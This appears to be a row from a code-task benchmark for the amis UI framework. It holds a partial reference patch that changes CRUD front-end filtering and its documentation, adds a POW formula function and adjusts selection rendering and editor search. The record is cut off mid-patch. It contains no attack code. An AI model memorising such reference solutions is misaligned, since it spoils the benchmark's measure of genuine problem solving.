base_commit
stringlengths
40
40
created_at
stringdate
2013-07-19 17:10:26
2025-07-23 01:54:17
hints_text
stringlengths
0
525k
instance_id
stringlengths
10
60
patch
stringlengths
174
256k
pr_description
stringlengths
3
99.8k
problem_statement
stringlengths
0
6.69k
pull_number
int64
1
61.8k
repo
stringlengths
5
54
test_patch
stringlengths
173
254k
FAIL_TO_PASS
listlengths
1
122k
PASS_TO_PASS
listlengths
0
190k
interface
stringlengths
4
33.3k
license
stringclasses
11 values
install_config
dict
meta
dict
6885663c1110693e29ecc7736f75f1a466952982
2023-10-11 08:03:57
baidu__amis-8354
diff --git a/docs/zh-CN/components/crud.md b/docs/zh-CN/components/crud.md index 7a3db1a77..971314e2c 100755 --- a/docs/zh-CN/components/crud.md +++ b/docs/zh-CN/components/crud.md @@ -2795,7 +2795,6 @@ CRUD 中不限制有多少个单条操作、添加一个操作对应的添加一 > 本文中的例子为了不相互影响都关闭了这个功能。 > 另外如果需要使用接口联动,需要设置`syncLocation: false` - `syncLocation`开启后,数据域经过地址栏同步后,原始值被转化为字符串同步回数据域,但布尔值(boolean)同步后不符合预期数据结构,导致组件渲染出错。比如查询条件表单中包含[Checkbox](./form/checkbox)组件,此时可以设置`{"trueValue": "1", "falseValue": "0"}`,将真值和假值设置为字符串格式规避。 ## 前端一次性加载 @@ -2846,8 +2845,6 @@ CRUD 中不限制有多少个单条操作、添加一个操作对应的添加一 "syncLocation": false, "api": "/api/mock2/sample", "loadDataOnce": true, - "autoGenerateFilter": true, - "filterSettingSource": ["browser", "version"], "columns": [ { "name": "id", @@ -2895,6 +2892,131 @@ CRUD 中不限制有多少个单条操作、添加一个操作对应的添加一 > **注意:**如果你的数据量较大,请务必使用服务端分页的方案,过多的前端数据展示,会显著影响前端页面的性能 +另外前端一次性加载当有查寻条件的时候,默认还是会重新请求一次,如果配置 `loadDataOnceFetchOnFilter` 为 `false` 则为前端过滤。 + +```schema: scope="body" +{ + "type": "crud", + "syncLocation": false, + "api": "/api/mock2/sample", + "loadDataOnce": true, + "loadDataOnceFetchOnFilter": false, + "autoGenerateFilter": true, + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + }, + { + "name": "platform", + "label": "Platform(s)" + }, + { + "name": "version", + "label": "Engine version", + "searchable": { + "type": "select", + "name": "version", + "label": "Engine version", + "clearable": true, + "multiple": true, + "searchable": true, + "checkAll": true, + "options": [ + "1.7", + "3.3", + "5.6" + ], + "maxTagCount": 10, + "extractValue": true, + "joinValues": false, + "delimiter": ",", + "defaultCheckAll": false, + "checkAllLabel": "全选" + } + }, + { + "name": "grade", + "label": "CSS grade" + } + ] +} +``` + +`loadDataOnceFetchOnFilter` 配置成 `true` 则会强制重新请求接口比如以下用法 + +> 此时如果不配置或者配置为 `false` 是前端直接过滤,不过记得配置 name 为行数据中的属性,如果行数据中没有对应属性则不会起作用 + +```schema: scope="body" +{ + "type": "crud", + "syncLocation": false, + "api": "/api/mock2/sample", + "loadDataOnce": true, + "loadDataOnceFetchOnFilter": true, + "headerToolbar": [ + { + "type": "search-box", + "name": "keywords" + } + ], + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + }, + { + "name": "platform", + "label": "Platform(s)" + }, + { + "name": "version", + "label": "Engine version", + "searchable": { + "type": "select", + "name": "version", + "label": "Engine version", + "clearable": true, + "multiple": true, + "searchable": true, + "checkAll": true, + "options": [ + "1.7", + "3.3", + "5.6" + ], + "maxTagCount": 10, + "extractValue": true, + "joinValues": false, + "delimiter": ",", + "defaultCheckAll": false, + "checkAllLabel": "全选" + } + }, + { + "name": "grade", + "label": "CSS grade" + } + ] +} +``` + ## 动态列 > since 1.1.6 diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' - } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/fis-conf.js b/fis-conf.js index 98590a300..fb70f4d97 100644 --- a/fis-conf.js +++ b/fis-conf.js @@ -253,7 +253,7 @@ fis.match('*.html:jsx', { // 这些用了 esm fis.match( - '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js}', + '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js,downshift/**.js,react-intersection-observer/**.js}', { parser: fis.plugin('typescript', { sourceMap: false, diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/renderers/Form.tsx b/packages/amis-core/src/renderers/Form.tsx index 3f88f3910..e33734f60 100644 --- a/packages/amis-core/src/renderers/Form.tsx +++ b/packages/amis-core/src/renderers/Form.tsx @@ -1154,6 +1154,8 @@ export default class Form extends React.Component<FormProps, object> { if (target) { this.submitToTarget(filterTarget(target, values), values); + /** 可能配置页面跳转事件,页面路由变化导致persistKey不一致,无法清除持久化数据,所以提交成功事件之前先清理一下 */ + clearPersistDataAfterSubmit && store.clearLocalPersistData(); dispatchEvent('submitSucc', createObject(this.props.data, values)); } else if (action.actionType === 'reload') { action.target && @@ -1185,6 +1187,7 @@ export default class Form extends React.Component<FormProps, object> { ? filter(saveFailed, store.data) : undefined, onSuccess: async (result: Payload) => { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // result为提交接口返回的内容 const dispatcher = await dispatchEvent( 'submitSucc', @@ -1245,6 +1248,7 @@ export default class Form extends React.Component<FormProps, object> { }); }); } else { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // type为submit,但是没有配api以及target时,只派发事件 dispatchEvent('submitSucc', createObject(this.props.data, values)); } diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index e7c546a94..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, @@ -145,8 +144,7 @@ export const CRUDStore = ServiceStore.named('CRUDStore') data?: object, options?: fetchOptions & { forceReload?: boolean; - loadDataOnce?: boolean; // 配置数据是否一次性加载,如果是这样,由前端来完成分页,排序等功能。 - loadDataOnceFetchOnFilter?: boolean; // 在开启loadDataOnce时,filter时是否去重新请求api + loadDataOnce?: boolean; // 配置数据是否一次性加载,如果是这样,由前端来完成分页,排序等 source?: string; // 支持自定义属于映射,默认不配置,读取 rows 或者 items loadDataMode?: boolean; syncResponse2Query?: boolean; @@ -159,7 +157,6 @@ export const CRUDStore = ServiceStore.named('CRUDStore') options: fetchOptions & { forceReload?: boolean; loadDataOnce?: boolean; // 配置数据是否一次性加载,如果是这样,由前端来完成分页,排序等功能。 - loadDataOnceFetchOnFilter?: boolean; // 在开启loadDataOnce时,filter时是否去重新请求api source?: string; // 支持自定义属于映射,默认不配置,读取 rows 或者 items loadDataMode?: boolean; syncResponse2Query?: boolean; @@ -181,36 +178,36 @@ export const CRUDStore = ServiceStore.named('CRUDStore') if (Array.isArray(options.columns)) { options.columns.forEach((column: any) => { - let value: any; + let value: any = + typeof column.name === 'string' + ? getVariable(self.query, column.name) + : undefined; const key = column.name; - if ((column.searchable || column.filterable) && key) { + if (value != null && key) { // value可能为null、undefined、''、0 - value = getVariable(self.query, key); - if (value != null) { - if (Array.isArray(value)) { - if (value.length > 0) { - const arr = [...items]; - let arrItems: Array<any> = []; - value.forEach(item => { - arrItems = [ - ...arrItems, - ...matchSorter(arr, item, { - keys: [key], - threshold: matchSorter.rankings.CONTAINS - }) - ]; - }); - items = items.filter((item: any) => - arrItems.find(a => a === item) - ); - } - } else { - items = matchSorter(items, value, { - keys: [key], - threshold: matchSorter.rankings.CONTAINS + if (Array.isArray(value)) { + if (value.length > 0) { + const arr = [...items]; + let arrItems: Array<any> = []; + value.forEach(item => { + arrItems = [ + ...arrItems, + ...matchSorter(arr, item, { + keys: [key], + threshold: matchSorter.rankings.CONTAINS + }) + ]; }); + items = items.filter((item: any) => + arrItems.find(a => a === item) + ); } + } else { + items = matchSorter(items, value, { + keys: [key], + threshold: matchSorter.rankings.CONTAINS + }); } } }); diff --git a/packages/amis-core/src/store/table.ts b/packages/amis-core/src/store/table.ts index bd7ec4a84..af99148db 100644 --- a/packages/amis-core/src/store/table.ts +++ b/packages/amis-core/src/store/table.ts @@ -1017,6 +1017,7 @@ export const TableStore = iRendererStore index, width: origin?.width || 0, minWidth: origin?.minWidth || 0, + realWidth: origin?.realWidth || 0, rawIndex: index - PARTITION_INDEX, type: item.type || 'plain', pristine: item.pristine || item, diff --git a/packages/amis-core/src/utils/debug.tsx b/packages/amis-core/src/utils/debug.tsx index c15e9507b..8f4a23371 100644 --- a/packages/amis-core/src/utils/debug.tsx +++ b/packages/amis-core/src/utils/debug.tsx @@ -8,10 +8,12 @@ import {findDOMNode, render, unmountComponentAtNode} from 'react-dom'; // import {createRoot} from 'react-dom/client'; import {autorun, observable} from 'mobx'; import {observer} from 'mobx-react'; -import {uuidv4} from './helper'; +import {uuidv4, importLazyComponent} from './helper'; import position from './position'; -export const JsonView = React.lazy(() => import('react-json-view')); +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); class Log { @observable cat = ''; diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index 3d4fa48b4..71ddc701d 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -1587,7 +1587,7 @@ export function mapObject( } if (Array.isArray(value)) { - return value.map(item => mapObject(item, fn)); + return value.map(item => mapObject(item, fn, skipFn)); } if (isObject(value)) { @@ -1595,7 +1595,8 @@ export function mapObject( Object.keys(tmpValue).forEach(key => { (tmpValue as PlainObject)[key] = mapObject( (tmpValue as PlainObject)[key], - fn + fn, + skipFn ); }); return tmpValue; @@ -2174,3 +2175,8 @@ export function evalTrackExpression( }) .join(''); } + +// 很奇怪的问题,react-json-view import 有些情况下 mod.default 才是 esModule +export function importLazyComponent(mod: any) { + return mod.default.__esModule ? mod.default : mod; +} diff --git a/packages/amis-editor-core/src/component/Preview.tsx b/packages/amis-editor-core/src/component/Preview.tsx index c8e62b71e..66ce6f045 100644 --- a/packages/amis-editor-core/src/component/Preview.tsx +++ b/packages/amis-editor-core/src/component/Preview.tsx @@ -413,24 +413,37 @@ export default class Preview extends Component<PreviewProps> { @autobind handleDragEnter(e: React.DragEvent) { + if (!this.props.editable) { + // 非编辑态下不监听拖拽事件 + return; + } const manager = this.props.manager; manager.dnd.dragEnter(e.nativeEvent); } @autobind handleDragLeave(e: React.DragEvent) { + if (!this.props.editable) { + return; + } const manager = this.props.manager; manager.dnd.dragLeave(e.nativeEvent); } @autobind handleDragOver(e: React.DragEvent) { + if (!this.props.editable) { + return; + } const manager = this.props.manager; manager.dnd.dragOver(e.nativeEvent); } @autobind handleDrop(e: React.DragEvent) { + if (!this.props.editable) { + return; + } const manager = this.props.manager; manager.dnd.drop(e.nativeEvent); } diff --git a/packages/amis-editor-core/src/component/base/SearchPanel.tsx b/packages/amis-editor-core/src/component/base/SearchPanel.tsx index c486defea..a71c74d30 100644 --- a/packages/amis-editor-core/src/component/base/SearchPanel.tsx +++ b/packages/amis-editor-core/src/component/base/SearchPanel.tsx @@ -4,6 +4,7 @@ import {Icon, InputBox, resolveVariable} from 'amis'; import cx from 'classnames'; import {autobind, stringRegExp} from '../../util'; import isString from 'lodash/isString'; +import {matchSorter} from 'match-sorter'; /** * 通用搜索功能组件,附带以下功能: @@ -182,7 +183,7 @@ export default class SearchPanel extends React.Component< /** * 根据关键字过滤数据,按分组存放 */ - groupedResultByKeyword(keywords?: string) { + groupedResultByKeyword(keywords: string = '') { const {allResult} = this.props; let curSearchResult: any[] = []; let curSearchResultByTag: { @@ -194,21 +195,15 @@ export default class SearchPanel extends React.Component< ? new RegExp(stringRegExp(curKeyword), 'i') : null; - allResult.forEach(item => { - if (isString(item) && regular && regular.test(item)) { + if (allResult.length && isString(allResult[0])) { + matchSorter(allResult, keywords).forEach(item => { // 兼容字符串类型 curSearchResult.push(item); - } else if ( - !keywords || - ['name', 'description', 'scaffold.type', 'searchKeywords'].some(key => { - return ( - resolveVariable(key, item) && - regular && - (regular.test(resolveVariable(key, item)) || - regular.test(resolveVariable(key, item)?.replaceAll('-', ''))) - ); - }) - ) { + }); + } else { + matchSorter(allResult, keywords, { + keys: ['name', 'description', 'scaffold.type', 'searchKeywords'] + }).forEach(item => { if (item[curTagKey]) { const tags = Array.isArray(item[curTagKey]) ? item[curTagKey].concat() @@ -222,8 +217,8 @@ export default class SearchPanel extends React.Component< } else { curSearchResult.push(item); } - } - }); + }); + } // 更新当前搜索结果数据(备注: 附带重置功能) this.setState({ diff --git a/packages/amis-editor-core/src/plugin/DataDebug.tsx b/packages/amis-editor-core/src/plugin/DataDebug.tsx index b68429d0d..0e26fc97a 100644 --- a/packages/amis-editor-core/src/plugin/DataDebug.tsx +++ b/packages/amis-editor-core/src/plugin/DataDebug.tsx @@ -1,7 +1,10 @@ import {registerEditorPlugin} from '../manager'; import {BaseEventContext, BasePlugin, BasicToolbarItem} from '../plugin'; import React from 'react'; -export const JsonView = React.lazy(() => import('react-json-view')); +import {importLazyComponent} from 'amis-core'; +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * 添加调试功能 diff --git a/packages/amis-editor-core/src/store/editor.ts b/packages/amis-editor-core/src/store/editor.ts index 8a9cadd25..62fa33294 100644 --- a/packages/amis-editor-core/src/store/editor.ts +++ b/packages/amis-editor-core/src/store/editor.ts @@ -53,6 +53,7 @@ import isPlainObject from 'lodash/isPlainObject'; import {EditorManagerConfig} from '../manager'; import {EditorNode, EditorNodeType} from './node'; import findIndex from 'lodash/findIndex'; +import {matchSorter} from 'match-sorter'; export interface SchemaHistory { versionId: number; @@ -684,39 +685,26 @@ export const MainStore = types /** 根据关键字过滤组件 */ groupedRenderersByKeyword( _subRenderers: Array<SubRendererInfo>, - keywords?: string + keywords: string = '' ) { const subRenderers = _subRenderers; const grouped: { [propName: string]: Array<SubRendererInfo>; } = {}; - const regular = keywords - ? new RegExp(stringRegExp(keywords), 'i') - : null; - - subRenderers.forEach(item => { - if ( - !keywords || - ['name', 'description', 'scaffold.type', 'searchKeywords'].some( - key => - resolveVariable(key, item) && - regular && - (regular.test(resolveVariable(key, item)) || - regular.test(resolveVariable(key, item)?.replaceAll('-', ''))) - ) - ) { - const tags = Array.isArray(item.tags) - ? item.tags.concat() - : item.tags - ? [item.tags] - : ['其他']; - - tags.forEach(tag => { - grouped[tag] = grouped[tag] || []; - grouped[tag].push(item); - }); - } + matchSorter(subRenderers, keywords, { + keys: ['name', 'description', 'scaffold.type', 'searchKeywords'] + }).forEach(item => { + const tags = Array.isArray(item.tags) + ? item.tags.concat() + : item.tags + ? [item.tags] + : ['其他']; + + tags.forEach(tag => { + grouped[tag] = grouped[tag] || []; + grouped[tag].push(item); + }); }); return grouped; diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index 65f87f69b..4529381b8 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1063,14 +1063,12 @@ export function getI18nEnabled() { } /** schema 翻译方法 */ -export function translateSchema(schema: any, replaceData?: any) { +export function translateSchema(schema: any, replaceData?: any, skipFn?: any) { replaceData = replaceData || (window as any)?.editorStore?.appCorpusData; if (!isPlainObject(replaceData)) { return schema; } - return mapObject(schema, (item: any) => { - return replaceData[item] || item; - }); + return mapObject(schema, (item: any) => replaceData[item] || item, skipFn); } /** 应用级别的翻译方法 */ diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index f00316787..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,16 +515,16 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - curRendererSchema.popOverContainer = window.document.body; } + JSONPipeOut(curRendererSchema); + // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { return translateSchema(curRendererSchema, this.appCorpusData); } - return JSONPipeOut(curRendererSchema); + return curRendererSchema; } @autobind diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..8e44dc051 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) { diff --git a/packages/amis-ui/scss/components/form/_result-list.scss b/packages/amis-ui/scss/components/form/_result-list.scss index de4de56a6..08de5947a 100644 --- a/packages/amis-ui/scss/components/form/_result-list.scss +++ b/packages/amis-ui/scss/components/form/_result-list.scss @@ -53,6 +53,7 @@ > label { flex-basis: px2rem(50px); flex-grow: 1; + width: px2rem(50px); &.is-invalid { color: var(--Form-selectValue-onInvalid-color); diff --git a/packages/amis-ui/scss/components/form/_selection.scss b/packages/amis-ui/scss/components/form/_selection.scss index b1bae3fae..ae5b59927 100644 --- a/packages/amis-ui/scss/components/form/_selection.scss +++ b/packages/amis-ui/scss/components/form/_selection.scss @@ -38,6 +38,12 @@ margin-right: var(--Checkbox-gap); } } + + &-ellipsis-line { + display: inline-block; + width: 100%; + @include truncate(); + } } .#{$ns}GroupedSelection { @@ -104,6 +110,7 @@ &-itemLabel { flex-grow: 1; + overflow: hidden; span { vertical-align: middle; diff --git a/packages/amis-ui/src/components/ChainedSelection.tsx b/packages/amis-ui/src/components/ChainedSelection.tsx index 9cc4b9efc..30b110e1b 100644 --- a/packages/amis-ui/src/components/ChainedSelection.tsx +++ b/packages/amis-ui/src/components/ChainedSelection.tsx @@ -106,7 +106,8 @@ export class ChainedSelection extends BaseSelection< checked: !!~valueArray.indexOf(option), onChange: () => this.toggleOption(option), disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> </div> @@ -153,7 +154,8 @@ export class ChainedSelection extends BaseSelection< checked: !!~this.state.selected.indexOf(id), onChange: () => this.selectOption(option, depth, id), disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> diff --git a/packages/amis-ui/src/components/GroupedSelection.tsx b/packages/amis-ui/src/components/GroupedSelection.tsx index 636574547..d8ee8ee46 100644 --- a/packages/amis-ui/src/components/GroupedSelection.tsx +++ b/packages/amis-ui/src/components/GroupedSelection.tsx @@ -48,7 +48,8 @@ export class GroupedSelection extends BaseSelection<BaseSelectionProps> { checked: false, onChange: () => undefined, disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> @@ -92,7 +93,8 @@ export class GroupedSelection extends BaseSelection<BaseSelectionProps> { checked: false, onChange: () => undefined, disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> </div> @@ -161,7 +163,8 @@ export class GroupedSelection extends BaseSelection<BaseSelectionProps> { checked: !!~valueArray.indexOf(option), onChange: () => this.toggleOption(option), disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> </div> diff --git a/packages/amis-ui/src/components/ResultList.tsx b/packages/amis-ui/src/components/ResultList.tsx index a331cca1a..a97fbbadc 100644 --- a/packages/amis-ui/src/components/ResultList.tsx +++ b/packages/amis-ui/src/components/ResultList.tsx @@ -5,13 +5,13 @@ import React from 'react'; import Sortable from 'sortablejs'; import {findDOMNode} from 'react-dom'; import cloneDeep from 'lodash/cloneDeep'; +import cx from 'classnames'; import {Option, Options} from './Select'; import {ThemeProps, themeable} from 'amis-core'; import {Icon} from './icons'; import {autobind, guid} from 'amis-core'; -import {LocaleProps, localeable} from 'amis-core'; -import {BaseSelection, BaseSelectionProps} from './Selection'; +import {LocaleProps, localeable, ClassNamesFn} from 'amis-core'; import TransferSearch from './TransferSearch'; import VirtualList, {AutoSizer} from './virtual-list'; @@ -39,6 +39,7 @@ export interface ItemRenderStates { index: number; disabled?: boolean; labelField?: string; + classnames: ClassNamesFn; onChange: (value: any, name: string) => void; } @@ -51,10 +52,20 @@ export class ResultList extends React.Component< ResultListState > { static itemRender(option: Option, states: ItemRenderStates) { + const scopeLabel = option.scopeLabel || ''; + const label = option[states?.labelField || 'label']; + const canScopeLabelTitle = + typeof scopeLabel === 'string' || typeof scopeLabel === 'number'; + const canLabelTitle = + typeof label === 'string' || typeof label === 'number'; + const title = + canScopeLabelTitle && canLabelTitle ? `${scopeLabel}${label}` : ''; + const classnames = states.classnames; return ( - <span>{`${option.scopeLabel || ''}${ - option[states?.labelField || 'label'] - }`}</span> + <span title={title} className={classnames('Selection-ellipsis-line')}> + {scopeLabel} + {label} + </span> ); } @@ -286,7 +297,8 @@ export class ResultList extends React.Component< index, disabled, onChange: this.handleValueChange.bind(this, index), - labelField + labelField, + classnames: cx })} </label> diff --git a/packages/amis-ui/src/components/Selection.tsx b/packages/amis-ui/src/components/Selection.tsx index 4e9cf8679..b8b6e4753 100644 --- a/packages/amis-ui/src/components/Selection.tsx +++ b/packages/amis-ui/src/components/Selection.tsx @@ -17,7 +17,8 @@ import { findTree, flattenTree, getOptionValue, - getOptionValueBindField + getOptionValueBindField, + ClassNamesFn } from 'amis-core'; import Checkbox from './Checkbox'; import {Option, Options} from './Select'; @@ -56,6 +57,7 @@ export interface ItemRenderStates { checked: boolean; onChange: () => void; disabled?: boolean; + classnames: ClassNamesFn; } export class BaseSelection< @@ -63,10 +65,24 @@ export class BaseSelection< S = any > extends React.Component<T, S> { static itemRender(option: Option, states: ItemRenderStates) { + const label = option[states?.labelField || 'label']; + const tip = option.tip || ''; + const classnames = states.classnames; + + const canlabelTitle = + typeof label === 'string' || typeof label === 'number'; + const canTipTitle = typeof tip === 'string' || typeof label === 'number'; + const title = canlabelTitle && canTipTitle ? `${label} ${tip}` : ''; + return ( - <span className={cx({'is-invalid': option?.__unmatched})}> - {option[states?.labelField || 'label']} - {option.tip || ''} + <span + title={title} + className={`${cx({'is-invalid': option?.__unmatched})} ${classnames( + 'Selection-ellipsis-line' + )}`} + > + {label} + {tip} </span> ); } @@ -255,6 +271,7 @@ export class BaseSelection< checked: !!~valueArray.indexOf(option), onChange: () => this.toggleOption(option), labelField, + classnames: cx, disabled: disabled || option.disabled })} </Checkbox> diff --git a/packages/amis-ui/src/components/Transfer.tsx b/packages/amis-ui/src/components/Transfer.tsx index 17da84e71..a8010072e 100644 --- a/packages/amis-ui/src/components/Transfer.tsx +++ b/packages/amis-ui/src/components/Transfer.tsx @@ -420,18 +420,21 @@ export class Transfer< @autobind optionItemRender(option: Option, states: ItemRenderStates) { - const {optionItemRender, labelField = 'label'} = this.props; + const {optionItemRender, labelField = 'label', classnames} = this.props; return optionItemRender ? optionItemRender(option, states) - : BaseSelection.itemRender(option, {labelField, ...states}); + : BaseSelection.itemRender(option, {labelField, ...states, classnames}); } @autobind resultItemRender(option: Option, states: ItemRenderStates) { - const {resultItemRender} = this.props; + const {resultItemRender, classnames} = this.props; return resultItemRender ? resultItemRender(option, states) - : ResultList.itemRender(option, states); + : ResultList.itemRender(option, { + ...states, + classnames + }); } renderSelect( diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 3f0842151..5766cbf71 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -1261,7 +1261,8 @@ export class TreeSelector extends React.Component< checked: checked, labelField: labelField, onChange: () => this.handleCheck(item, !checked), - disabled: disabled || item.disabled + disabled: disabled || item.disabled, + classnames: cx }) : highlightTxt ? highlight(`${item[labelField]}`, highlightTxt) diff --git a/packages/amis-ui/src/components/TreeSelection.tsx b/packages/amis-ui/src/components/TreeSelection.tsx index 29dd9873a..5145caabc 100644 --- a/packages/amis-ui/src/components/TreeSelection.tsx +++ b/packages/amis-ui/src/components/TreeSelection.tsx @@ -267,7 +267,8 @@ export class TreeSelection extends BaseSelection< multiple: multiple, checked: checked, onChange: () => this.toggleOption(option), - disabled: disabled || option.disabled + disabled: disabled || option.disabled, + classnames: cx })} </div> diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index 6daa3d5bc..d5dbfd218 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -315,7 +315,11 @@ export interface CRUDCommonSchema extends BaseSchema, SpinnerExtraProps { loadDataOnce?: boolean; /** - * 在开启loadDataOnce时,filter时是否去重新请求api + * 在开启loadDataOnce时,当修改过滤条件时是否重新请求api + * + * 如果没有配置,当查询条件表单触发的会重新请求 api,当是列过滤或者是 search-box 触发的则不重新请求 api + * 如果配置为 true,则不管是什么触发都会重新请求 api + * 如果配置为 false 则不管是什么触发都不会重新请求 api */ loadDataOnceFetchOnFilter?: boolean; @@ -474,7 +478,6 @@ export default class CRUD extends React.Component<CRUDProps, any> { filterTogglable: false, filterDefaultVisible: true, loadDataOnce: false, - loadDataOnceFetchOnFilter: true, autoFillHeight: false }; @@ -997,7 +1000,7 @@ export default class CRUD extends React.Component<CRUDProps, any> { undefined, undefined, undefined, - loadDataOnceFetchOnFilter, + loadDataOnceFetchOnFilter !== false, isInit ); } @@ -1190,7 +1193,6 @@ export default class CRUD extends React.Component<CRUDProps, any> { pickerMode, env, loadDataOnce, - loadDataOnceFetchOnFilter, source, columns, dispatchEvent @@ -1228,7 +1230,6 @@ export default class CRUD extends React.Component<CRUDProps, any> { autoAppend: true, forceReload, loadDataOnce, - loadDataOnceFetchOnFilter, source, silent, pageField, @@ -1670,11 +1671,18 @@ export default class CRUD extends React.Component<CRUDProps, any> { handleQuery( values: object, - forceReload: boolean = false, + forceReload?: boolean, replace?: boolean, resetPage?: boolean ) { - const {store, syncLocation, env, pageField, perPageField} = this.props; + 